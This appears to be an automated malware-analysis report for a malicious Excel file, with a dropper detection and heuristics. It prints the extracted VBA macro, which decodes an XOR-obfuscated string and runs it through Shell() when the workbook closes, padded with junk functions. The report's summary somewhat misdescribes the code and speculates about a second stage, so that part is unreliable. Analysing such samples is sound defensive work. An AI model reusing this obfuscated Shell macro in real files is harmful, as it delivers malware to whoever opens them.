MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The critical heuristic OLE_VBA_SHELL indicates that the VBA macros within this Excel file attempt to execute a command. The script reconstructs the string 'calc' and executes it using the Shell() function, likely to download and run a second-stage payload. The ClamAV detection further confirms its malicious nature as a dropper.
Heuristics 3
-
ClamAV: Xls.Dropper.Agent-7401228-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Dropper.Agent-7401228-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2054 bytes |
SHA-256: ba189e7eb90f83d0ef92e2383580b33322a3d8c72f9e3d0ac283a539e2fe77b7 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub maybe()
heart
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_BeforeClose(Cancel As Boolean)
maybe
Var = "calc"
Shell (Var)
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module2"
Sub heart()
LL1 = fMf5j80uf(" B v ;F PX x", "qjw6eVxO2")
LL2 = fMf5j80uf("; c", "VeLqiZ8wF")
LL3 = fMf5j80uf(" $ ", "iWnqclUVA")
LL4 = fMf5j80uf(" >#U1 6 %?U, ", "rvDZ9DkWo")
LL5 = fMf5j80uf("& Y ! >", "Kz6eOwMRf")
LL = LL1 + LL2 + LL3 + LL4 + LL5
Shell (LL)
End Sub
Public Function YDyzxCnuBRs()
Dim sRuZQEtNEvISCBp As Integer
sRuZQEtNEvISCBp = "4470"
End Function
Public Function lNhMkCOCAuMJgPbgdoFG()
Dim sRuZQEtNEvISCBp As Integer
sRuZQEtNEvISCBp = "4470"
Dim rUkQQqyoTOPNSDwDi As Long
rUkQQqyoTOPNSDwDi = "8898"
End Function
Public Function fMf5j80uf(ByVal tYKgX4jdl As String, ByVal I50RspIZC As String) As String
Dim a2xCMwg4M As Long
For a2xCMwg4M = 1 To Len(tYKgX4jdl)
fMf5j80uf = fMf5j80uf & Chr(Asc(Mid(I50RspIZC, IIf(a2xCMwg4M Mod Len(I50RspIZC) <> 0, a2xCMwg4M Mod Len(I50RspIZC), Len(I50RspIZC)), 1)) Xor Asc(Mid(tYKgX4jdl, a2xCMwg4M, 1)))
Next a2xCMwg4M
End Function
Private Function phGjNytiCtkx()
Dim PrNaoVnZdD As Integer
PrNaoVnZdD = "7985"
End Function
Private Function ByUrPURdgvQblgJZsLfaOuDECHslsQ()
Dim PrNaoVnZdD As Integer
PrNaoVnZdD = "7985"
If "FxQmeOwySvAOZtGu" = "HedEmDquTuFROlHgYTgwLhUeBw" Then End
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.